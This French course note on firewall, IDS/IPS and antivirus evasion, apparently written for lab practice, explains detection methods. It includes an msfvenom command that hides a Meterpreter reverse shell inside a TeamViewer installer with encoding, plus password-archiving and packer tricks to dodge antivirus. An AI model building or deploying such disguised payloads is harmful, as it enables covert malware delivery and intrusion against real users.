Firewall and IDS/IPS Evasion

Pour attaquer efficacement et discrètement une cible, il est crucial de comprendre ses défenses. Deux notions importantes sont présentées :

Endpoint protection
Perimeter protection

🖥️ Endpoint Protection

L’endpoint protection désigne toute protection locale sur un hôte réseau unique (PC, poste de travail ou serveur en DMZ). Elle inclut souvent :

Antivirus
Antimalware (bloatware, spyware, adware, scareware, ransomware)
Firewall
Anti-DDOS

Exemples : Avast, Nod32, Malwarebytes, BitDefender.

🌐 Perimeter Protection

La perimeter protection se situe à la frontière réseau (physique ou virtualisée). Elle gère l’accès depuis l’extérieur (Internet) vers l’intérieur (réseau privé).

La DMZ est une zone à sécurité intermédiaire, hébergeant les serveurs accessibles au public.

📜 Security Policies

Les politiques de sécurité dictent les flux autorisés et interdits sur le réseau. Elles peuvent concerner :

Trafic réseau
Applications
Accès utilisateurs
Gestion de fichiers
Protection DDoS

Méthodes de détection

Security Policy

Description

Signature-based Detection

Détection via modèles connus, générant une alerte si correspondance exacte

Heuristic / Statistical Anomaly Detection

Analyse comportementale par rapport à une base de référence, détecte les anomalies

Stateful Protocol Analysis Detection

Vérifie la conformité des protocoles par rapport à des profils standards

Live-monitoring and Alerting (SOC-based)

Supervision par une équipe SOC ou automatisée pour détection d’intrusions

🕵️ Evasion Techniques

Les antivirus modernes reposent surtout sur la détection par signatures. Les techniques d’évasion incluent :

Encodage de payloads avec msfvenom
Tunnel AES pour les communications Meterpreter
Injection en mémoire pour éviter les fichiers persistants
Utilisation de templates exécutables pour dissimuler le payload

Exemple de commande :

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

📦 Archives et Compression

Archiver un fichier avec mot de passe peut contourner certaines signatures AV. Exemple de double archivage et suppression de l’extension :

rar a ~/test.rar -p ~/test.js
mv test.rar test
rar a test2.rar -p test
mv test2.rar test2

Résultat : réduction des détections antivirus.

📦 Packers

Un packer compresse l’exécutable et le payload ensemble, ajoutant une couche de protection contre la détection. Exemples : UPX, Enigma Protector, MPRESS, Themida.

💻 Exploit Coding

Lors du codage d’un exploit :

Varier les patterns pour contourner IDS/IPS
Éviter les NOP sleds visibles
Tester dans un environnement sandbox avant déploiement

⚠️ Note sur l’évasion

Cette section présente une vue générale de l’évasion. Les modules suivants approfondiront la théorie et la pratique. Il est conseillé de s’exercer sur des machines HTB ou des VM avec des versions d’AV plus anciennes.

PreviousIntroduction to MSFVenom NextMetasploit-Framework Updates – August 2020

Last updated 5 months ago

hashtag🖥️ Endpoint Protection

hashtag🌐 Perimeter Protection

hashtag📜 Security Policies

hashtag🕵️ Evasion Techniques

hashtag📦 Archives et Compression

hashtag📦 Packers

hashtag💻 Exploit Coding

hashtag⚠️ Note sur l’évasion